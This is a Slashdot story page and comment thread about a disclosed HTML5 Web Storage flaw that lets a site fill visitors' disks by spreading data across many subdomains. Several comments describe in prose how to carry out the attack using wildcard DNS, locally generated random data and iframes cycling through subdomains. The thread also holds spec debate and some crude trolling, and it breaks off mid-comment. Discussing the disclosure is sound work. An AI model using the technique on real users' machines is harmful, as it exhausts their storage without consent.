Slashdot: News for Nerds

HTML5 Storage Bug Can Fill Your Hard Drive

Soulskill posted about a year ago | from the disk-write-error dept.

Bug 199

Dystopian Rebel writes "A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE. Feross Aboukhadijeh has demonstrated that these browsers allow unbounded local storage. 'The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB). ... The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer. However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no. ... However, Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Aboukhadijeh has logged the bug with Chromium and Apple, but couldn't do so for MSIE because 'the page is broken' (see http://connect.microsoft.com/IE). Oops. Firefox's implementation of HTML5 local storage is not vulnerable to this exploit."
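The loop at the heart of the demonstration is simple enough to sketch. The following is a hedged illustration, not Aboukhadijeh's actual code: the function and key names are invented, and in a real browser `storage` would be window.localStorage, whose setItem throws once the origin's quota is hit.

```javascript
// Hedged sketch of filling one origin's Web Storage quota with locally
// generated data. Names here are invented for illustration.
function makeChunk(sizeBytes) {
  // One ASCII character per byte; random-ish digits so the content
  // cannot be trivially deduplicated.
  let out = "";
  while (out.length < sizeBytes) {
    out += Math.floor(Math.random() * 10); // appends one digit character
  }
  return out;
}

function fillOrigin(storage, limitBytes, chunkBytes) {
  // Write chunk-sized values under distinct keys until either our own
  // limit is reached or the browser throws (QuotaExceededError).
  let written = 0;
  try {
    while (written < limitBytes) {
      storage.setItem("pad-" + written, makeChunk(chunkBytes));
      written += chunkBytes;
    }
  } catch (e) {
    // Per-origin quota exhausted; the attack hops to the next subdomain.
  }
  return written;
}
```

At a 5 MB per-origin quota, around 200 such origins add up to a gigabyte of junk on disk, which is where the subdomain trick discussed below comes in.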


199 comments

Anonymous coward bug can fill your anus (-1)

Anonymous Coward | about a year ago | (#43035181)

You know it, I know it. All those FP's linking to the Gospel of Christmas Island know what I mean.

Slashdot, at least we're better than Reddit! You have finally been modded up from the minusworld of trolldom.

Re:Anonymous coward bug can fill your anus (1, Offtopic)

Deekin_Scalesinger (755062) | about a year ago | (#43035289)

Entirely offtopic (and I am prepared for the karma hit), but today is my birthday!

Re:Anonymous coward bug can fill your anus (0)

Anonymous Coward | about a year ago | (#43035317)

Have a good one Deekin

So What's The Point (2, Insightful)

Anonymous Coward | about a year ago | (#43035193)

This seems like mental masturbation to me. I see no point in initiating such an "attack".

If I understand correctly, you are going to expend great effort and possibly money on tens of thousands of subdomains, transfer a lot of data and incur bandwidth charges, in order to fill someone's hard drive? This is about the lamest DoS attack I have ever heard of. And the easy fix is to simply clear cookies?

Come on, this is a non-issue looking to be a problem.

Re:So What's The Point (3, Interesting)

MicrosoftRepresentit (1002310) | about a year ago | (#43035283)

JavaScript can generate the data quicker than most hard disks can write it, with no bandwidth usage other than fetching the script itself, so that's not a problem. But yeah, just a single gigabyte would require 200 subdomains, so I'm not really seeing the danger here.

Re:So What's The Point (5, Informative)

The Mighty Buzzard (878441) | about a year ago | (#43035485)

Really? You've never admin'd a dns server then. It's trivial to have one respond to wildcard subdomain names that you could generate dynamically on page load with one line of javascript.

Re:So What's The Point (5, Informative)

arth1 (260657) | about a year ago | (#43035711)

It doesn't take much work or time to set up a wildcard CNAME entry pointing to a single web server that answers a wildcard. You now have billions of subdomains with a couple of minutes of work.
The web instance serves a short javascript which generates a boatload of data on the client side, and then calls a random subdomain to reload the js with a new domain name.

All this can be linked to a single ad (or blog comment, for vulnerable boards that allow css exploits).
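The wildcard record arth1 mentions is a one-liner. A hypothetical BIND zone fragment (the domain and address are invented for illustration):

```dns
; Every subdomain of example.com -- 1.example.com, 2.example.com, any
; random label -- resolves to the same web server via the wildcard.
*.example.com.   300  IN  A  203.0.113.10
example.com.     300  IN  A  203.0.113.10
```

On the web server, a wildcard vhost (e.g. ServerAlias *.example.com in Apache, or server_name *.example.com in nginx) lets a single site answer for all of them.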

Re:So What's The Point (1)

gandhi_2 (1108023) | about a year ago | (#43035391)

Imagine the network usage bill for your VPS trying to fill every hard drive of every device that visits your site.

Re:So What's The Point (4, Interesting)

thetoadwarrior (1268702) | about a year ago | (#43035731)

It's a web app; let the client generate it. You generate the free subdomains with a script or something a bit more intelligent, but either way the cost should be minimal. I assume as well you wouldn't necessarily need to fill it completely. A gig or two might ruin the browser's performance.

Re:So What's The Point (4, Informative)

TheRaven64 (641858) | about a year ago | (#43036769)

You misunderstand how the attack works. The client-side code is allowed to store 5-10MB per domain, but it can generate this data (Math.random() will do it fine). The per-domain limit means that you need one HTTP request per 5-10MB, but on the server that will be a wildcard DNS entry always resolving to the same server. If you set the cache headers with a sufficiently long timeout, then you can probably have a single site hosting the .js (so the browser will only request it once) and then just send a tiny HTML page referencing it. The JavaScript then creates a new iframe with a new (random) subdomain as the target, and so each HTTP request to your server (a total of about 1KB of traffic) generates 5-10MB of data on the client's hard disk.
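The iframe driver described here can be sketched in a few lines; the domain, path, and label length below are assumptions for illustration, not taken from the actual exploit page.

```javascript
// Hedged sketch of the driver page: invent a random subdomain label,
// point an iframe at it, and let the wildcard DNS do the rest.
function randomLabel(len) {
  const chars = "abcdefghijklmnopqrstuvwxyz0123456789";
  let s = "";
  for (let i = 0; i < len; i++) {
    s += chars[Math.floor(Math.random() * chars.length)];
  }
  return s;
}

function nextOriginUrl(baseDomain) {
  // Each fresh label is a brand-new origin with its own 5-10MB quota.
  return "http://" + randomLabel(10) + "." + baseDomain + "/fill.html";
}

// In a browser, the loop would look roughly like:
//   const frame = document.createElement("iframe");
//   frame.src = nextOriginUrl("example.com");
//   document.body.appendChild(frame);
// repeating whenever the frame signals (e.g. via postMessage) that its
// per-origin quota is full.
```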

Mobile devices? (4, Insightful)

dclozier (1002772) | about a year ago | (#43035399)

Devices with smaller drives, like a cell phone, tablet, or laptops like Google's Pixel, would be more vulnerable. Perhaps you could create some JavaScript that simply makes requests to iterated subdomains, each of which returns a small amount of JavaScript that then generates large amounts of text to store locally? The bandwidth needed would then be much smaller, with the same amount of damage done. I have no idea if this scenario is possible, though, so take this with a grain of salt.

Re:So What's The Point (5, Insightful)

Qzukk (229616) | about a year ago | (#43035407)

Subdomains are free. With a wildcard DNS record, you have nearly an infinite supply of them.

much easier than you think (3, Informative)

Anonymous Coward | about a year ago | (#43035733)

, transfer a lot of data and incur bandwidth charges,

Posting anonymously since this shows how it could be done.

I don't see any need to transfer data. Simply generate random strings programmatically. One could easily write a few lines of code. The storage API is a 'key' and 'value' system, so just randomly generate keys and randomly generate values in a loop. Super easy. For the subdomain stuff, like others have said, use a wildcard for DNS. Then just serve the small js file that runs, then programmatically generates a new random subdomain to dynamically load the js file.

The end point is that you don't need a lot of bandwidth to screw up someone's computer.

Re:So What's The Point (0)

arth1 (260657) | about a year ago | (#43035831)

Subdomains are free. With a wildcard DNS record, you have nearly an infinite supply of them.

Pet peeve: "Nearly infinite" makes no sense, unless you mean infinite of a lower order (like infinity minus seven, which is still infinite).
The number of possible wildcard DNS records exceeds anything you might possibly need, use, or want, but it's still a finite number, and not anywhere near infinite. It's much closer to zero than it is to even a billionth of a billionth of infinite.

With a wildcard DNS record, you have as many subdomains as you need.

Re:So What's The Point (5, Insightful)

Jiro (131519) | about a year ago | (#43035951)

That's not true.

"Nearly infinite" means "it's not infinite, but it's large enough that it has most of the same practical effects as it would if it were infinite".

You seem to be interpreting the word "nearly" to mean "has a numerical value close to" rather than "has effects similar to". Obviously it is nonsensical for something to be nearly infinite using that first definition, but that should be a warning sign that you're not using the definition that people mean, not that everyone else is speaking nonsense.

Re:So What's The Point (0)

arth1 (260657) | about a year ago | (#43036827)

You seem to be interpreting the word "nearly" to mean "has a numerical value close to" rather than "has effects similar to".

I'd happily go for "has effects similar to", but it doesn't have any of the effects similar to infinity.
Divide it by a large number, and it becomes noticeably smaller. Multiply it by a large number, and it becomes noticeably bigger.
Subtract it from itself and it becomes zero instead of undefined.

What I see is a use of "infinitely" as a synonym for "extremely large". It isn't, precisely because of the effects you mentioned.

Re:So What's The Point (1)

BaronAaron (658646) | about a year ago | (#43036967)

The DNS specifications state the max length of a domain name is 253 characters. Assuming you could get the smallest possible root domain name of 4 characters (x.cc for example), that leaves 248 characters (253 minus the domain and its leading dot).

To complicate things a little more, the specifications state each label (subdomain) can't exceed 63 characters. That means 3 full subdomains of 63 characters plus 1 subdomain of 56 characters once you account for the periods. Grand total of 245 characters to play with.

The specifications state that the only valid characters are ASCII A-Z, a-z, 0-9, and hyphen meaning 63 potential values for each character.

63^245 ≈ 6.894e440 possible combinations.

More than the number of atoms in the observable universe by several hundred orders of magnitude.
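The arithmetic above can be checked exactly with JavaScript's BigInt:

```javascript
// 63 permitted values in each of the 245 usable positions worked out above.
const combos = 63n ** 245n;
// The exact integer has 441 decimal digits, i.e. roughly 6.9e440.
console.log(combos.toString().length); // prints 441
```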

Re:So What's The Point (0)

Anonymous Coward | about a year ago | (#43035475)

Subdomains do not cost any money, any domain can have an unlimited number of them, and DNS servers can be configured to accept wildcard hostnames. So anyone could have effectively infinite subdomains to attack with, with no more effort than routing randomstring.domain.com to the same server and an Apache mod_rewrite rule to generate random content for each subdomain.

Re:So What's The Point (1)

utkonos (2104836) | about a year ago | (#43035675)

Not sure what effort you are referring to. I can create large numbers of subdomains using a simple script to modify the zone file. Subdomains cost nothing. No effort, and no money.
Bandwidth is nearly nothing because I don't have to transfer any data to create data on the victim's drive if I use javascript.
Lastly, you're not thinking about threats holistically. This just becomes one single tool added to a group of other tools that can be employed in an advanced persistent threat attack.

Re:So What's The Point (3, Interesting)

bill_mcgonigle (4333) | about a year ago | (#43035689)

If you have a popular blog, there's no need to pay for network backup anymore - just drop enough 5MB blocks encrypted and with decent FEC to each of your readers. If you ever have a failure, just throw up a basic page with a funny cat picture and start restoring from your distributed backup.

Disable Javascript (3, Insightful)

Anonymous Coward | about a year ago | (#43035211)

Also, you're not vulnerable if you have javascript disabled.

Such is life when your browser automatically downloads and runs arbitrary untrusted software.

Re:Disable Javascript (2)

DarkRat (1302849) | about a year ago | (#43035343)

so if I disable JS, I shouldn't go to that site?

I wonder how fast I can fill my harddisk... (1, Funny)

Quazion (237706) | about a year ago | (#43035219)

This sounds like a nice weekend project, wonder how fast you can fill up a harddisk with just some javascript.

Re:I wonder how fast I can fill my harddisk... (2)

Sockatume (732728) | about a year ago | (#43035361)

Assuming 500GB free space and a 20Mbps ADSL connection, call it 2MB/s down... I make it almost three days.

I think you would notice.

Re:I wonder how fast I can fill my harddisk... (0)

Anonymous Coward | about a year ago | (#43035443)

Isn't HTML5 storage controlled by JS? Wouldn't it be faster to just set up a loop that locally writes garbage out to storage, rather than download everything from remote?

Re:I wonder how fast I can fill my harddisk... (4, Insightful)

claar (126368) | about a year ago | (#43035461)

You're assuming that you have to download the files. It's highly likely the data could be generated locally in JavaScript.

Re:I wonder how fast I can fill my harddisk... (1)

Sockatume (732728) | about a year ago | (#43035503)

Of course it is, ha.

Re:I wonder how fast I can fill my harddisk... (0)

Anonymous Coward | about a year ago | (#43035509)

No, you would generate the data on the client side.

See the example page: http://www.filldisk.com/ (plays music)

Re:I wonder how fast I can fill my harddisk... (1)

TheRaven64 (641858) | about a year ago | (#43036911)

His example filled 1GB every 16 seconds, so 500GB in about two hours. That was an SSD, though; you're basically limited by your hard drive's write speed (for extra fun, you'll likely fill up the disk cache and start swapping...). You may get 100MB/s from linear writes to a spinning disk if you're lucky; 20-30MB/s is more plausible. The data isn't fetched from the server; it's generated by the JavaScript.

Re:I wonder how fast I can fill my harddisk... (0)

Anonymous Coward | about a year ago | (#43035881)

Depends on how fast your hard drive is. You could probably fill 500GB in about an hour and a half.

Support response (2, Funny)

Anonymous Coward | about a year ago | (#43035229)

but couldn't do so for MSIE because 'the page is broken' (see http://connect.microsoft.com/IE [microsoft.com]). Oops

FUD! We haven't received a complaint yet.

Yours truly,
MS support.

Re:Support response (0)

Anonymous Coward | about a year ago | (#43035251)

The link isn't even broken. It worked fine on 2 phones and my desktop. Yes, it very much is FUD.

Bug, or exploit? (0, Troll)

Sockatume (732728) | about a year ago | (#43035275)

I think the summary author gives the game away in the last sentence on this one. It's not a bug, which implies unintended behavior that can accidentally happen. It's intended behavior that can be deliberately exploited to bad effect.

Re:Bug, or exploit? (5, Informative)

DarkRat (1302849) | about a year ago | (#43035371)

no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

Re:Bug, or exploit? (-1)

Sockatume (732728) | about a year ago | (#43035531)

I'd call that a design error. The browser is behaving as it is designed to, it's just that the way it's designed to behave is wrong.

Re:Bug, or exploit? (1)

Anonymous Coward | about a year ago | (#43035555)

It's called "Not Following The SPECIFICATION".

Re:Bug, or exploit? (-1, Troll)

Sockatume (732728) | about a year ago | (#43035621)

Which is a deliberate error in design. No amount of bug fixing will correct for an error in specification.

Re:Bug, or exploit? (3, Insightful)

K. S. Kyosuke (729550) | about a year ago | (#43035771)

Except that the specification is perfectly fine, it's the implementation that does something different. Or do you claim that the HTML5 spec is wrong when it says that browsers should not allow for this DoS attack to happen? Stop being a dick and admit your mistake.

Re:Bug, or exploit? (1)

DragonWriter (970822) | about a year ago | (#43036319)

Except that the specification is perfectly fine, it's the implementation that does something different.

Well, except that if you actually read the specification, nothing raised in TFS involves doing something different than required by the specification; in fact, the relevant recommended-but-not-required functionality described in the specification isn't defined at all (there is no definition of "affiliated origin", and only one example is given). The attack falls outside the simplest naive generalization of that example, and that generalization (e.g., treating all subdomains of the same 2LD as "affiliated origins") would also mean everything on, e.g., ".co.uk" would share the single-origin quota belonging to "co.uk".

Except that it isn't inconsistent with the spec (1)

DragonWriter (970822) | about a year ago | (#43035991)

It's called "Not Following The SPECIFICATION".

I think you need to review the relevant portion of the specification, particularly the use of the word "should" and the reference to RFC2119 for the specific definition of "should" that is applicable when used in the specification.

Re:Except that it isn't inconsistent with the spec (0)

Anonymous Coward | about a year ago | (#43036093)

Not that you're wrong, but I did like the "so you're saying we 'should' switch to Firefox?" response in the bug post. That was a pretty snappy comeback to that point.

Re:Bug, or exploit? (1)

mjr167 (2477430) | about a year ago | (#43036187)

So it's Microsoft?

Re:Bug, or exploit? (1)

thePowerOfGrayskull (905905) | about a year ago | (#43035953)

I'd call that a design error. The browser is behaving as it is designed to, it's just that the way it's designed to behave is wrong.

Which is, in other words, a bug.

Why do people persist in believing that bugs can only happen in code?

Re:Bug, or exploit? (1)

mcgrew (92797) | about a year ago | (#43036831)

A bug is an unwanted, undesigned-for response. As this was designed into the software, it's a design flaw, not a bug.

BTW, the world's first bug was a moth caught in a computer's wiring, hence its name. The first bug was indeed a hardware error, a short circuit caused by the moth.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43036841)

That's a ridiculous claim to make. By your logic, it's a design error that CPUs provide a "reset" instruction, because any privileged task could call it, and it could even allow non-privileged tasks to somehow call it.

Sometimes, in the interest of having something usable and implementable, you relax a few constraints and tell the implementor to watch out for known issues. It's not an error. It's a concession.

Read the spec: recommendation, not requirement (5, Informative)

DragonWriter (970822) | about a year ago | (#43035935)

no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

It's not a bug. While the Web Storage API Candidate Recommendation (related to, but not part of, the HTML5 spec) says both that user agents should set a per-origin storage limit and that they should identify and prevent use of "origins of affiliated sites" to circumvent that limit, it doesn't specify what constitutes an "affiliated site", and neither of those things that it says "should" be done is a requirement of the specification. "Should" has a quite specific meaning in the specification (defined by reference in the spec to RFC2119 [ietf.org]), and it's not the same as "must"; instead:

SHOULD This word, or the adjective "RECOMMENDED", mean that there may exist valid reasons in particular circumstances to ignore a particular item, but the full implications must be understood and carefully weighed before choosing a different course.

So, it's both a recommendation rather than a requirement, and not specified clearly enough to be implemented. There are some cases where origins of the same second-level domain are meaningfully affiliated, and some where they are not (for a clear case of the latter, consider subdomains of ".co.uk"). It's pretty clear that origins which differ only in protocol are almost always going to be affiliated by any reasonable definition (e.g., http://www.example.com/ [example.com] and https://www.example.com/ [example.com], which are different origins), but no automatic identification of origin affiliation by subdomain can be done simply without understanding of per-domain policies from the TLD down to the first level at which all subdomains are affiliated. (And this is a problem which will get worse with the planned explosion of TLDs.)
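A natural heuristic for "affiliated origins" is grouping by registrable domain, which is what the Public Suffix List was created to make computable (and which keeps ".co.uk" subdomains separate). A hedged toy sketch of that idea; the tiny hard-coded suffix table is an assumption standing in for the real list:

```javascript
// Toy "registrable domain" (eTLD+1) lookup. A real implementation would
// consult the full Public Suffix List, not this three-entry stand-in.
const PUBLIC_SUFFIXES = new Set(["com", "org", "co.uk"]);

function registrableDomain(host) {
  const labels = host.split(".");
  // Find the longest known public suffix, then keep one more label:
  // that label plus the suffix is the quota-sharing unit.
  for (let i = 1; i < labels.length; i++) {
    const suffix = labels.slice(i).join(".");
    if (PUBLIC_SUFFIXES.has(suffix)) {
      return labels.slice(i - 1).join(".");
    }
  }
  return host;
}

// Under this grouping, 1.filldisk.com and 2.filldisk.com would share
// one quota, while foo.co.uk and bar.co.uk would not.
```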

Re:Read the spec: recommendation, not requirement (1)

Kupfernigk (1190345) | about a year ago | (#43036345)

You must be awful fun when talking to customers. They tend not to understand the distinction between "shall" and "should".

"there may exist valid reasons in particular circumstances to ignore a particular item" - in other words, this is a case where the feature should ALWAYS be applied to generic software because that must deal with all circumstances, not just "particular" ones.

It really should not be hard to have a popup that says "This web page wants to create local storage on your computer allow/disallow", for instance, and then let the user decide if this is a particular circumstance.

Re:Read the spec: recommendation, not requirement (5, Informative)

DragonWriter (970822) | about a year ago | (#43036587)

You must be awful fun when talking to customers. They tend not to understand the distinction between "shall" and "should".

There is a reason why internet specifications (whether or not they are from IETF, and often whether or not they are even intended as standards-track) reference the RFC2119 definitions. "MUST" vs. "SHOULD" is an important distinction.

In this particular case, what's even more important is that the recommended functionality at issue isn't defined at all: there is just one example given (and the example doesn't fully specify the origins, so it's an incomplete example) and no definition of the parameters of the identification of "affiliated origins". So if it were a "MUST", it would be a broken standard (since it would be impossible to assess conformance), and as it is, it's impossible to say whether a particular implementation even implements the recommended functionality.

"there may exist valid reasons in particular circumstances to ignore a particular item" - in other words, this is a case where the feature should ALWAYS be applied to generic software because that must deal with all circumstances, not just "particular" ones

Any particular user agent is a "particular circumstance" (it is specific software with a specific use case within the scope of all possible kinds of user agents which might implement the Web Storage API); there is no such thing as an implementation that must deal with "all circumstances".

It really should not be hard to have a popup that says "This web page wants to create local storage on your computer allow/disallow"

It's not at all hard, but that's not related to the recommendation to implement per-origin quotas, or the further recommendation to build on top of the per-origin quota functionality to detect and limit the use of "affiliated origins" to circumvent the per-origin quotas, which is what is at issue here. Per-origin allow/disallow for Web Storage use isn't even a recommendation of the specification. (Though it is explicitly permitted behavior.)

Re:Bug, or exploit? (1)

DragonWriter (970822) | about a year ago | (#43036729)

HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

There are two errors in this statement:

  • The less significant error is that the relevant spec is the Web Storage specification, not the HTML5 specification;
  • The more significant error is that while the spec recommends per-origin quotas (which most browsers have), and recommends taking measures to identify and prevent the use of affiliated origins to circumvent per-origin limits, it does not, in fact, define what constitutes "affiliated origins" for the purpose of that recommendation, it just provides one example of a set of origins (and the origins in that example are incompletely specified).

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035415)

It's not intended behavior being exploited. Did you even read the summary?

>However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no.

It's a faulty implementation of the standard, which should be considered a bug, by any means.

Re:Bug, or exploit? (2)

DragonWriter (970822) | about a year ago | (#43036059)

It's not intended behavior being exploited. Did you even read the summary?

I read the summary. The author of the summary, however, has not read the spec [w3.org], or, if they have, has failed to understand all of the following: (1) that the use of per-origin quotas is a recommendation, not a requirement, of the spec; (2) that the use of controls to prevent the use of affiliated origins to circumvent the recommended per-origin quotas is also a recommendation, not a requirement, of the spec; and (3) that the spec actually doesn't define what constitutes an affiliated origin, so that even if per-origin quotas and affiliated-origin identification-and-blocking were required by the spec, it would be impossible to judge whether any particular implementation complied with the requirement.

If they understood any of those points, they wouldn't describe this as a "bug".

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035431)

So its a FEATURE that they do NOT follow the STANDARD ... ok.

No evidence spec is not being followed. (1)

DragonWriter (970822) | about a year ago | (#43036123)

So its a FEATURE that they do NOT follow the STANDARD ... ok.

The specification at issue is not a standard, it's a Candidate Recommendation [w3.org]. Okay, that's a technicality, but more importantly:
They are following it; both the per-origin quotas themselves and the controls for preventing use of affiliated origins to circumvent the quotas are recommendations (should), not requirements (must), of the spec, so even if they were not implemented at all, the implementation could be following the spec completely.
Further, the spec never defines criteria for determining affiliated origins with regard to the controls preventing circumvention of per-origin limits, so the fact that it doesn't prevent the particular use of related origins that was at issue in this test doesn't mean they don't have controls of the type recommended.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035497)

Glad you are not involved in any aspect of the design and development workflow, go back to your WoW gaming wearing your "know it all" cap.

Re:Bug, or exploit? (1)

Sockatume (732728) | about a year ago | (#43035561)

I have a doctorate and spend more time bathing in a given week than on videogames.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035605)

I have a Post-Doctorate in Distributed Computational Penile Tensionology along with many papers written, queer reviewd and published in top shelf publications.

Re:Bug, or exploit? (1)

Sockatume (732728) | about a year ago | (#43035629)

Are we done here? My coffee break ends soon.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035693)

Not at all, I am very happy to be help you waste your time on your coffee break :)

Re:Bug, or exploit? (1)

al.caughey (1426989) | about a year ago | (#43035707)

published with a brown paper wrapper too?

Fret not, Gecko users... (-1)

Anonymous Coward | about a year ago | (#43035321)

Firefox's implementation of HTML5 local storage is not vulnerable to this exploit.

I'm sure the Firefox dev team is working hard to bring that feature to the next version of Firefox... Firefox 20 is it? Which should silently infiltrate your computers anytime you connect to the internet with Firefox either open or set as your default browser, on or after February 28th, 2013!

Wait, what day is it?

It's a feature! (3, Interesting)

sootman (158191) | about a year ago | (#43035335)

1.porn.com, 2.porn.com, 3.porn.com...

Actually, that could be handy -- you could store lots of music from song.album.artist.someMP3site.com.

Re:It's a feature! (3, Interesting)

sootman (158191) | about a year ago | (#43035543)

Come to think of it, it could lead to problems. What if you read a lot of blogs hosted on wordpress.com? Or use many apps on *.google.com?

Re:It's a feature! (2)

fatphil (181876) | about a year ago | (#43036017)

Of course, you highlight another potential DoS: in the scenario you mention, one site can reduce the quota available to another subdomain, since they share it. It's a lose-lose situation: permit DoSing the user, or permit DoSing other sites on the same 2LD.

Let's hope they understand how ccTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB. When they specified cookies, they fucked up; I don't trust them to have learnt from their mistakes and got HTML5 correct, far from it.

Re:It's a feature! (1)

DragonWriter (970822) | about a year ago | (#43036219)

Let's hope they understand how CCTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB.

There's probably a reason that, contrary to the implication in TFS, the actual Web Storage Candidate Recommendation:

  • Recommends, but does not require, a per-origin quota,
  • Recommends, but does not require, user agents to take steps to identify and prevent use of "affiliated origins" to circumvent per-origin quotas,
  • Does not, in the preceding recommendation, provide a concrete definition of an "affiliated origin", leaving it up to UA implementors to determine, if they are going to follow the recommendation to identify and limit the use of "affiliated origins", how best to identify that origins are affiliated.

Opera is not vulnerable (-1)

Anonymous Coward | about a year ago | (#43035337)

Check your sources before you post.

Oh wait, this is slashdot and OP is probably a firefox supporter.

Re:Opera is not vulnerable (2)

Sockatume (732728) | about a year ago | (#43035385)

Is this a thing? People get tribal about browsers?

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43035451)

Are you new to the internet? Of course they do. People have been "getting tribal" about browsers since Netscape vs. IE back in like 1995.

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43035469)

Yep, Firefag fanbois have to go out of their way to tell everyone they use it. Even in stories for other browsers.

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43035851)

Welcome to 1997! [youtube.com]

Webkit was developed precisely because of this!

Re:Opera is not vulnerable (2)

Baloroth (2370816) | about a year ago | (#43036151)

Is this a thing? People get tribal about browsers?

Well, he could just be annoyed about the summary being blatantly wrong, since it specifically says that the bug exists in Opera when, in fact, it does not.

But yeah, people can be a bit competitive about their favorite browser. Not as bad as emacs vs. vi or anything, but it does happen a bit.

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43036921)

Yes. Most of them have moved on to Chrome lately. You should hear the Chrome guys bash Firefox lately. Just look at the twit comments here about how this will let Firefox fill your RAM and your HDD. Even though it's completely wrong and inane. People are stupid. And not just about sports teams or religious and political affiliations.

Another annoying Chromium Bug... (1)

CajunArson (465943) | about a year ago | (#43035341)

On Linux using the pepperflash plugins, lots & lots of zombie processes get created and aren't even killed after you exit the browser. When I noticed 5GB of memory usage on an empty desktop, I realized that Chromium is a pro-zombie browser.

Re:Another annoying Chromium Bug... (2)

The MAZZTer (911996) | about a year ago | (#43035437)

Chrome will remain running if you have apps installed that want to run in the background. There is an option in Settings to suppress this behavior. On Windows Chrome keeps a notification icon showing so you can shut down the browser and force these background apps to quit. Other platforms probably have something similar.

Chrome also keeps a process running for Cloud Print, if you have it enabled.

The 5GB is probably a badly-behaving app/extension. Check Chrome's Task Manager to figure out which one.

Re:Another annoying Chromium Bug... (1)

Anonymous Coward | about a year ago | (#43035495)

On Linux using the pepperflash plugins, lots & lots of zombie processes get created and aren't even killed after you exit the browser. When I noticed 5GB of memory usage on an empty desktop, I realized that Chromium is a pro-zombie browser.

The what plugins? Since when does anyone use PepperFlash on Chromium? Are those even included in Chromium builds, as opposed to straight-up Chrome?

Regardless, long story short, despite its other flaws, I never see this on the plain Flash plugin.

has FF fixed their memory leak? (-1)

Anonymous Coward | about a year ago | (#43035369)

I tried to like Chrome, but can't seem to get used to it.

wordpress.com? (1, Insightful)

malignant_minded (884324) | about a year ago | (#43035441)

isn't everyone's blog a subdomain?

Re:wordpress.com? (0)

Anonymous Coward | about a year ago | (#43035569)

> isn't everyone's blog a subdomain?

There's no technical reason why a certain kind of content (like a blog) has to live on a subdomain. So no.
This is a blog: http://www.ikeahackers.net/ [ikeahackers.net] - no subdomain. What you consider to be a blog seems ill-defined.

Re:wordpress.com? (2)

malignant_minded (884324) | about a year ago | (#43035635)

Let me clarify, since I thought it was clear but apparently not: isn't everyone who uses wordpress.com to host a blog using a subdomain of wordpress.com? If that is true, doesn't that make this standard a little difficult to follow?

Re:wordpress.com? (1)

Anonymous Coward | about a year ago | (#43035819)

I was thinking the same thing, but about a different kind of site... what about dyndns or no-ip and their ilk? If Firefox has implemented things this way, how hasn't this come up as a problem with any of these kinds of sites? Some of their people must have run into this issue.

Re:wordpress.com? (1)

Beorytis (1014777) | about a year ago | (#43036407)

It's only difficult to follow (in that particular case) if all the wordpress blogs you read, combined, need more local storage than the limit allows.

Re:wordpress.com? (1)

malignant_minded (884324) | about a year ago | (#43036577)

It's not the user that follows the standard; it's the browser and its developers that determine "yeah, we can do that". As many people pointed out, this would have impacts on more than my example; it's just the one at the tip of my tongue. I can only guess the devs looked at that, said "that breaks too much", and tossed this 'suggestion' in the standard aside. I'm sure the devs thought about more than stupid wordpress sites. I doubt they would set this up to work on some domains and not others; it's likely "we follow this or we don't", so the particular use case is irrelevant.

Re:wordpress.com? (0)

Anonymous Coward | about a year ago | (#43035667)

Wow, you're a fucking moron.

Re:wordpress.com? (1)

Ziktar (196669) | about a year ago | (#43035755)

Yes, but typically wordpress blogs don't need to store local content for a fancy HTML5 app.

Re:wordpress.com? (0)

Anonymous Coward | about a year ago | (#43035963)

what about co.uk then?

Re:wordpress.com? (1)

91degrees (207121) | about a year ago | (#43036001)

There are quite a few largely independent third- and even fourth-level domains. International domains, for example, often use something like .com.au or .co.uk. Then there are ISPs in those countries. It's less common now, but there are still a few username.demon.co.uk accounts kicking about.
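The parent's point is easy to demonstrate: any "affiliated origin" rule based purely on host names has to know about public suffixes. Purely as an illustration (the spec defines no such rule, and `sameSite` is a made-up name for this sketch), a naive "last two labels" grouping looks like this:

```javascript
// Naive sketch of an "affiliated site" grouping rule the spec hints at but
// never defines: treat two hosts as affiliated when they share their last
// two DNS labels. This correctly lumps 1.filldisk.com with 2.filldisk.com,
// but also wrongly lumps every .co.uk site together -- the exact problem
// raised above. A real browser would need a public-suffix list instead.
function sameSite(hostA, hostB) {
  const tail = host => host.split('.').slice(-2).join('.');
  return tail(hostA) === tail(hostB);
}
```

Fixing that false positive is exactly the reason Mozilla maintains the Public Suffix List.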

Firefox... (0)

Anonymous Coward | about a year ago | (#43035903)

Firefox is only safe from the exploit because it'll max out your RAM and crash well before it has chance to fill your hard disk.

It does this normally, without even trying.

Editing (1)

guttentag (313541) | about a year ago | (#43035995)

A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE.

OK, so we're talking about Google, Apple, Opera and Microsoft. But then...

The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer.

Now we're talking about Google, Mozilla, Opera and Microsoft. Where did Mozilla come from, and where did Apple go?

Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Firefox's implementation of HTML5 local storage is not vulnerable to this exploit.

Now we're talking about Google, Apple, Microsoft and Mozilla. Apple's back, and Opera is left out this time, and even though the author seemed to be indicating that Mozilla's browser was on the vulnerable list, now it's set apart.

Editors, if a summary is inconsistent, please clean it up or don't promote the story.

Re:Editing (1)

